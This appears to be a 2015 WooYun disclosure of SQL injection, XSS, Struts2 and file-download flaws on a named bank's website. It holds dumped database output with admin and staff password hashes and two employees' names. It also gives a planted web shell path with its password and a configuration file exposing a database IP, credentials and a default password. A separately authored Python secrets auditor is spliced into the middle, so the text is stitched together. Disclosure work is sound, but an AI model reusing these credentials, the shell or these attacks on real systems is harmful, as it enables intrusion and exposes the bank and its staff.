
SQL injection / Struts2 vulnerabilities at a bank

2015-02-24 21:40

1. Injection vulnerability

http://www.cccb.cn/front/main.action?des=10&method=view&tranCode=240002&tranType=ajax

[Screenshot: 2.jpg]



available databases [7]:
[*] CTXSYS
[*] EP2WEBSITE
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM

web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
Database: EP2WEBSITE

+------------------+---------+
| Table            | Entries |
+------------------+---------+
| PUBVISITDAYLIST  | 22951   |
| PUBTRANSLOG      | 21114   |
| ARTNEWSINFO      | 1667    |
| PUBVISITCOUNT    | 1431    |
| VOTBOOK          | 145     |
| MGZPIC           | 77      |
| ARTCOLUMNINFO    | 61      |
| PUBPARAM         | 57      |
| CONINFO          | 52      |
| PUBMENUINFO      | 45      |
| MGZINFO          | 21      |
| RECWORKRECORD    | 17      |
| CYCMENUINFO      | 12      |
| CONLINKMAN       | 10      |
| RECEDUCATION     | 10      |
| RECAPPLICANTINFO | 8       |
| VOTOPT           | 6       |
| CONCLASS         | 5       |
| RECFAMILY        | 4       |
| USERGROUPINFO    | 3       |
| USERINFO         | 3       |
| CYCUSERINFO      | 2       |
| ORGINFO          | 2       |
| RECAWARDSINFO    | 2       |
| CYCCONSOLE       | 1       |
| PUBNOTICE        | 1       |
| RECPOSITION      | 1       |
| VOTINFO          | 1       |
+------------------+---------+

Database: EP2WEBSITE
Table: USERINFO
[3 entries]
+-----+--------+------------------+--------+----------------------------------+----------+----------+----------+-----------+-----------+-----------+---------------------+---------------------+
| GID | ORG | FLAG | STATUS | PASSWD | USERCODE | USERNAME | USERPOST | PASSERROR | USERLEVEL | BASEGROUP | LASTLOGINTIME | CURRENTLOGINTIME |
+-----+--------+------------------+--------+----------------------------------+----------+----------+----------+-----------+-----------+-----------+---------------------+---------------------+
| 1 | 999999 | 00000000 | 0 | B4BA5283CC2B64521DAFB8248B639882 | admin | admin | NULL | 0 | 00 | 00 | 2015-01-08 10:38:18 | 2015-01-08 10:43:30 |
| 384 | 999999 | 1000000000000000 | 0 | BDE0CE38440C224D5C10497AD365EAE0 | 800433 | 任玉菲 | NULL | 0 | 01 | 01 | NULL | 2014-12-25 09:10:00 |
| 385 | 999999 | 1000000000000000 | 0 | 6D222AADB13C8516C2079486771776EA | 801365 | 吴迪 | NULL | 0 | 01 | 01 | NULL | 2014-12-25 09:10:26 |
+-----+--------+------------------+--------+----------------------------------+----------+----------+----------+-----------+-----------+-----------+---------------------+---------------------+



web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
Database: EP2WEBSITE
Table: CONINFO
[52 entries]





2. XSS

[Screenshot: 1.jpg]





3. Struts2

http://www.cccb.cn/front/main.action

[Screenshot: 3.jpg]





http://www.cccb.cn/wooyun.jsp

Password: wooyun

[Screenshot: 6.jpg]



The database password can be found in config.properties

#database dev service configration
dbUrl=jdbc:oracle:thin:@31.23.36.109:1521:Ep2Web
dbUser=ep2website
dbPass=ep2website
dbSchema=EP2WEBSITE

user_encypt=yes
packagePreName=cn.cccb.appsource
servicePackage=cn.cccb.appsource.service
workunitPackage=cn.cccb.appsource.workunit.app
workapiPackage=cn.cccb.appsource.workunit.api
batchUnitPackage=cn.cccb.appsource.batch
defaultPassword=111111
uploadDir=/home/Ep2Web/uploads
certificatesPath=/home/Ep2Web/certificates
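A defender-side check for the kind of file shown above, as an added example that is not part of the original report: a small Python auditor that parses a properties file and flags secrets kept in clear text, secrets equal to an account name, and short or all-digit values. The sample input is constructed (placeholder host, account and values), and treating `ENC(...)` or `${VAR}` values as externalized is an assumption of this example.

```python
import re

# Constructed sample that mirrors the key names in the config.properties above;
# host, account and secret values are placeholders made up for this example.
SAMPLE = """\
#database dev service configuration
dbUrl=jdbc:oracle:thin:@db.example.internal:1521:APPDB
dbUser=appuser
dbPass=appuser
defaultPassword=111111
uploadDir=/home/app/uploads
"""

SECRET_KEY = re.compile(r"(pass(word|wd)?|secret|token)$", re.I)
USER_KEY = re.compile(r"user(name)?$", re.I)
# Assumption: values wrapped as ENC(...) or ${VAR} are encrypted or injected at
# deploy time, so the file itself holds no usable secret.
EXTERNALIZED = re.compile(r"^(ENC\(.+\)|\$\{.+\})$")


def parse_properties(text):
    """Parse key=value / key:value lines, skipping blanks and #/! comments."""
    props = {}
    for line in map(str.strip, text.splitlines()):
        m = re.match(r"([^=:\s]+)\s*[=:]\s*(.*)", line)
        if m and line[0] not in "#!":
            props[m.group(1)] = m.group(2)
    return props


def audit(props):
    """Return (key, finding) pairs for secrets a reader of the file could reuse."""
    users = {v.lower() for k, v in props.items() if USER_KEY.search(k)}
    findings = []
    for key, value in props.items():
        if not SECRET_KEY.search(key) or EXTERNALIZED.match(value):
            continue
        findings.append((key, "plaintext secret in file"))
        if value.lower() in users:
            findings.append((key, "same as account name"))
        if len(value) < 12 or value.isdigit() or len(set(value)) <= 2:
            findings.append((key, "short or guessable"))
    return findings


if __name__ == "__main__":
    for key, finding in audit(parse_properties(SAMPLE)):
        print(f"{key}: {finding}")
```

Run in a build or deployment pipeline, a check like this fails the release before such a file reaches a web-readable server.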





4. Arbitrary file download

[Screenshot: 4.jpg]



Proof of vulnerability:

[Screenshots: 2.jpg, 1.jpg, 3.jpg, 6.jpg, 4.jpg]

Remediation:

1. Filter special characters (for the injection and XSS issues)

2. Upgrade the Struts2 framework

3. Access control

Source: www.wooyun.org/bugs/wooyun-2015-090991
